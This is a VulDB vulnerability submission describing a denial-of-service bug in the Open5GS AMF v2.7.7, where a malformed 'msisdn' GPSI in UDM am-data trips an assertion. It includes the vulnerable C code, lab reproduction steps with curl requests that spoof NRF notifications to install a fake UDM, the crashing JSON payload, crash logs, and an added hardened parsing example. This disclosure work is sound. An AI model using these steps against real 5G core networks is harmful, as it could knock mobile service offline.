Submit #804336: Open5gs AMF v2.7.7 Denial of Service

Title: Open5gs AMF v2.7.7 Denial of Service

Description:

### Open5GS Release, Revision, or Tag

v2.7.7

### Description

AMF aborts during a real UE registration flow when the `Nudm_SDM` `am-data` response contains a malformed GPSI entry whose string is just `msisdn` instead of a full `msisdn-...` identifier.

This path is UE-driven: the crash is only reached after an external UE starts a normal 5G registration procedure and AMF performs:

```text
PUT /nudm-uecm/v1/{supi}/registrations/amf-3gpp-access
GET /nudm-sdm/v2/{supi}/am-data
```

inside the registration state machine.

The vulnerable AMF code is:

```c
gpsi = ogs_id_get_type(node->data);
if (gpsi) {
    if (strncmp(gpsi, OGS_ID_GPSI_TYPE_MSISDN, strlen(OGS_ID_GPSI_TYPE_MSISDN)) == 0) {
        amf_ue->msisdn[amf_ue->num_of_msisdn] = ogs_id_get_value(node->data);
        ogs_assert(amf_ue->msisdn[amf_ue->num_of_msisdn]);
        amf_ue->num_of_msisdn++;
    }
}
```

at `../src/amf/nudm-handler.c:60-69`.

`ogs_id_get_value()` expects two `-`-separated tokens. For the string `msisdn`, the second `strsep()` returns `NULL`:

```c
token = strsep(&p, "-");
...
token = strsep(&p, "-");
if (!token) {
    ogs_error("strsep[%s] failed", str);
    goto cleanup;
}
```

at `../lib/proto/types.c:345-354`.

That makes `ogs_id_get_value("msisdn")` return `NULL`, which immediately trips the AMF assertion at `nudm-handler.c:66-67`.

This is distinct from the newly confirmed `gpsis` overflow issue. That earlier bug requires many valid `msisdn-*` entries and crashes after memory corruption; this one crashes with a single malformed GPSI value at a different crash site.

### Root cause

- Entry chain: external UE registration -> AMF `PUT /nudm-uecm/.../amf-3gpp-access` -> AMF `GET /nudm-sdm/v2/{supi}/am-data` -> `amf_nudm_sdm_handle_provisioned()`
- Exact crash site: `../src/amf/nudm-handler.c:66-67`
- Upstream parser/business mismatch: `../lib/proto/types.c:345-354`
- Root cause family: parser/business-logic mismatch leading to assertion abort
- Controlling field: `AccessAndMobilitySubscriptionData.gpsis[0]`

### Steps to Reproduce

1. Start the Open5GS Docker lab and ensure these containers are running:

   ```bash
   docker start db ausf udm udr pcf smf upf amf nssf
   ```

2. Confirm the subscriber exists in MongoDB. In my live run, the existing test subscriber was:

   ```text
   IMSI: 001011234567891
   ```

3. Start a real gNB and UE with the bundled UERANSIM configs:

   ```bash
   docker run --rm -d --name amf-audit-gnb --network open5gs \
     --network-alias gnb.ueransim.org \
     -v /home/ubuntu/docker-open5gs/configs/internal/ueransim/gnb.yaml:/ueransim/config/gnb.yaml:ro \
     free5gc/ueransim:latest /ueransim/nr-gnb -c /ueransim/config/gnb.yaml
   docker run --rm -d --name amf-audit-ue --network open5gs \
     --network-alias ue.ueransim.org \
     --cap-add NET_ADMIN --device /dev/net/tun:/dev/net/tun \
     -v /home/ubuntu/docker-open5gs/configs/internal/ueransim/ue.yaml:/ueransim/config/ue.yaml:ro \
     free5gc/ueransim:latest /ueransim/nr-ue -c /ueransim/config/ue.yaml -r
   ```

4. Start the fake UDM helper on the host:

   ```bash
   node /home/ubuntu/open5gs_277/.audit_tmp/amf_fake_udm.js
   ```

5. Replace the real UDM in AMF's local cache with the fake UDM:

   ```bash
   AMF_IP=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' amf)
   curl --http2-prior-knowledge -sS -i -m 8 \
     -X POST "http://$AMF_IP/nnrf-nfm/v1/nf-status-notify" \
     -H 'content-type: application/json' \
     --data '{"event":"NF_DEREGISTERED","nfInstanceUri":"http://nrf.open5gs.org/nnrf-nfm/v1/nf-instances/4568f3be-3644-41f1-bff0-3b335fd843b5"}'
   curl --http2-prior-knowledge -sS -i -m 8 \
     -X POST "http://$AMF_IP/nnrf-nfm/v1/nf-status-notify" \
     -H 'content-type: application/json' \
     --data '{"event":"NF_REGISTERED","nfInstanceUri":"http://10.33.33.1:18083/nnrf-nfm/v1/nf-instances/fake-udm-amf","nfProfile":{"nfInstanceId":"fake-udm-amf","nfType":"UDM","nfStatus":"REGISTERED","fqdn":"fake-udm-amf.local","ipv4Addresses":["10.33.33.1"],"allowedNfTypes":["SCP","AMF","SMF","AUSF"],"priority":0,"capacity":100,"load":0,"nfServices":[{"serviceInstanceId":"fake-udm-ueau","serviceName":"nudm-ueau","versions":[{"apiVersionInUri":"v1","apiFullVersion":"1.0.0"}],"scheme":"http","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.33.1","port":18083}],"allowedNfTypes":["AUSF"],"priority":0,"capacity":100,"load":0},{"serviceInstanceId":"fake-udm-uecm","serviceName":"nudm-uecm","versions":[{"apiVersionInUri":"v1","apiFullVersion":"1.0.0"}],"scheme":"http","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.33.1","port":18083}],"allowedNfTypes":["AMF","SMF"],"priority":0,"capacity":100,"load":0},{"serviceInstanceId":"fake-udm-sdm","serviceName":"nudm-sdm","versions":[{"apiVersionInUri":"v2","apiFullVersion":"2.0.0"}],"scheme":"http","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.33.1","port":18083}],"allowedNfTypes":["AMF","SMF"],"priority":0,"capacity":100,"load":0}]}}'
   ```

6. Control experiment: configure the fake UDM to return a normal GPSI (`msisdn-1234567890`), then trigger UE registration. In the confirmed control run, the UE completed registration and PDU session establishment successfully.

7. Malicious experiment: change only the fake UDM mode so `am-data` returns:

   ```json
   {"gpsis":["msisdn"]}
   ```

   Then start the UE registration flow again:

   ```bash
   printf 'am-data-gpsi-malformed\n' > /home/ubuntu/open5gs_277/.audit_tmp/amf_fake_udm.mode
   docker run --rm -d --name amf-audit-gnb --network open5gs \
     --network-alias gnb.ueransim.org \
     -v /home/ubuntu/docker-open5gs/configs/internal/ueransim/gnb.yaml:/ueransim/config/gnb.yaml:ro \
     free5gc/ueransim:latest /ueransim/nr-gnb -c /ueransim/config/gnb.yaml
   docker run --rm -d --name amf-audit-ue --network open5gs \
     --network-alias ue.ueransim.org \
     --cap-add NET_ADMIN --device /dev/net/tun:/dev/net/tun \
     -v /home/ubuntu/docker-open5gs/configs/internal/ueransim/ue.yaml:/ueransim/config/ue.yaml:ro \
     free5gc/ueransim:latest /ueransim/nr-ue -c /ueransim/config/ue.yaml -r
   docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' amf
   docker logs --tail 120 amf
   ```

### Logs

Control evidence:

```text
Initial Registration is successful
PDU Session establishment is successful
PSI[1] running
0
```

Container state after the malicious response:

```text
exited 134 2026-04-12T15:01:04.914002411Z
0
```

AMF logs:

```text
04/12 15:00:56.403: [sbi] INFO: [nudm-ueau] NFService associated [28262e44-367f-41f1-862a-81de7e8f7ca7] (../lib/sbi/context.c:2109)
04/12 15:00:56.403: [sbi] INFO: Setup NF EndPoint(fqdn) [udm.open5gs.org:0] (../lib/sbi/context.c:2111)
04/12 15:00:56.403: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.14:80] (../lib/sbi/context.c:2111)
04/12 15:00:56.403: [sbi] INFO: [nudm-uecm] NFService associated [28262e9e-367f-41f1-862a-81de7e8f7ca7] (../lib/sbi/context.c:2109)
04/12 15:00:56.403: [sbi] INFO: Setup NF EndPoint(fqdn) [udm.open5gs.org:0] (../lib/sbi/context.c:2111)
04/12 15:00:56.403: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.14:80] (../lib/sbi/context.c:2111)
04/12 15:00:56.403: [sbi] INFO: [nudm-sdm] NFService associated [28262eda-367f-41f1-862a-81de7e8f7ca7] (../lib/sbi/context.c:2109)
04/12 15:00:56.403: [sbi] INFO: Setup NF EndPoint(fqdn) [udm.open5gs.org:0] (../lib/sbi/context.c:2111)
04/12 15:00:56.403: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.14:80] (../lib/sbi/context.c:2111)
04/12 15:01:04.262: [sbi] INFO: [28259240-367f-41f1-862a-81de7e8f7ca7] (NRF-notify) NF_DEREGISTERED event [type:UDM] (../lib/sbi/nnrf-handler.c:1186)
04/12 15:01:04.289: [sbi] INFO: [fake-udm-amf] (NRF-notify) NF registered (../lib/sbi/nnrf-handler.c:1154)
04/12 15:01:04.289: [sbi] INFO: [fake-udm-amf] (NRF-notify) NF Profile updated [type:UDM] (../lib/sbi/nnrf-handler.c:1168)
04/12 15:01:04.289: [sbi] INFO: [UDM] NFInstance associated [fake-udm-amf] (../lib/sbi/context.c:2441)
04/12 15:01:04.289: [sbi] INFO: Setup NF EndPoint(fqdn) [fake-udm-amf.local:0] (../lib/sbi/context.c:2446)
04/12 15:01:04.289: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.13:80] (../lib/sbi/context.c:2446)
04/12 15:01:04.289: [sbi] INFO: [nudm-ueau] NFService associated [fake-udm-ueau] (../lib/sbi/context.c:2109)
04/12 15:01:04.289: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.13:18083] (../lib/sbi/context.c:2111)
04/12 15:01:04.289: [sbi] INFO: [nudm-uecm] NFService associated [fake-udm-uecm] (../lib/sbi/context.c:2109)
04/12 15:01:04.289: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.13:18083] (../lib/sbi/context.c:2111)
04/12 15:01:04.289: [sbi] INFO: [nudm-sdm] NFService associated [fake-udm-sdm] (../lib/sbi/context.c:2109)
04/12 15:01:04.289: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.13:18083] (../lib/sbi/context.c:2111)
04/12 15:01:04.569: [amf] INFO: gNB-N2 accepted[10.33.33.8]:33749 in ng-path module (../src/amf/ngap-sctp.c:113)
04/12 15:01:04.569: [amf] INFO: gNB-N2 accepted[10.33.33.8] in master_sm module (../src/amf/amf-sm.c:953)
04/12 15:01:04.576: [amf] INFO: [Added] Number of gNBs is now 1 (../src/amf/context.c:1277)
04/12 15:01:04.577: [amf] INFO: gNB-N2[10.33.33.8] max_num_of_ostreams : 10 (../src/amf/amf-sm.c:1000)
04/12 15:01:04.782: [amf] INFO: InitialUEMessage (../src/amf/ngap-handler.c:461)
04/12 15:01:04.782: [amf] INFO: [Added] Number of gNB-UEs is now 1 (../src/amf/context.c:2777)
04/12 15:01:04.782: [amf] INFO: RAN_UE_NGAP_ID[1] AMF_UE_NGAP_ID[1] TAC[1] CellID[0x10] (../src/amf/ngap-handler.c:622)
04/12 15:01:04.782: [amf] INFO: [suci-0-001-01-0000-0-0-1234567891] Unknown UE by SUCI (../src/amf/context.c:1912)
04/12 15:01:04.782: [amf] INFO: [Added] Number of AMF-UEs is now 1 (../src/amf/context.c:1688)
04/12 15:01:04.782: [gmm] INFO: Registration request (../src/amf/gmm-sm.c:1670)
04/12 15:01:04.782:
```
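The report's root cause is a parser that can legitimately return `NULL` for a one-token string, consumed by business logic that asserts on the result. The block below is an added example, not Open5GS code: `id_get_value()` is a hypothetical stand-in for the two-token split in `ogs_id_get_value()`, and `collect_msisdns()` shows the defensive consumer pattern (log and skip a malformed GPSI, never assert on peer-supplied data). The sample `gpsis` list is constructed.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_MSISDN 8
#define GPSI_TYPE_MSISDN "msisdn"
/* Hypothetical stand-in for ogs_id_get_value(): heap copy of the text after
 * the first '-', or NULL when no value token exists (the "msisdn" case). */
static char *id_get_value(const char *str)
{
    const char *dash = str ? strchr(str, '-') : NULL;
    if (!dash) return NULL;               /* no "type-value" split possible */
    size_t n = strlen(dash + 1) + 1;
    char *value = malloc(n);
    if (value) memcpy(value, dash + 1, n);
    return value;
}

/* Hardened consumer: a malformed GPSI is logged and skipped instead of
 * asserted on. Returns the number of MSISDNs stored in out[]; caller frees. */
static int collect_msisdns(const char *const *gpsis, int n, char *out[MAX_MSISDN])
{
    int count = 0;
    for (int i = 0; i < n && count < MAX_MSISDN; i++) {
        const char *gpsi = gpsis[i];
        if (!gpsi || strncmp(gpsi, GPSI_TYPE_MSISDN, strlen(GPSI_TYPE_MSISDN)) != 0)
            continue;                     /* absent or not an msisdn-type GPSI */
        char *value = id_get_value(gpsi);
        if (!value || !*value) {          /* "msisdn" or "msisdn-": reject */
            fprintf(stderr, "skipping malformed GPSI [%s]\n", gpsi);
            free(value);
            continue;
        }
        out[count++] = value;
    }
    return count;
}

/* Constructed gpsis list mixing the report's malformed value with valid and
 * non-msisdn entries; returns how many the hardened path accepts (2). */
static int demo_mixed_gpsis(void)
{
    static const char *const gpsis[] = { "msisdn", "msisdn-1234567890",
        "msisdn-", "nai-user@example.org", "msisdn-9876543210" };
    char *out[MAX_MSISDN];
    int count = collect_msisdns(gpsis, 5, out);
    for (int i = 0; i < count; i++) free(out[i]);
    return count;
}
```

With the report's `am-data` body `{"gpsis":["msisdn"]}` this path accepts zero MSISDNs and continues, whereas the `ogs_assert` in `nudm-handler.c:66-67` aborts the whole AMF process.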
Source: https://github.com/open5gs/open5gs/issues/4405
User: ZiyuLin (UID 93568)
Submission: 14.04.2026 11:41 (2 months ago)
Moderated: 01.05.2026 10:57 (17 days later)
Status: Accepted
VulDB Entry: 360536 [Open5GS up to 2.7.7 AMF /src/amf/nudm-handler.c ogs_id_get_value Denial of Service]
Points: 20
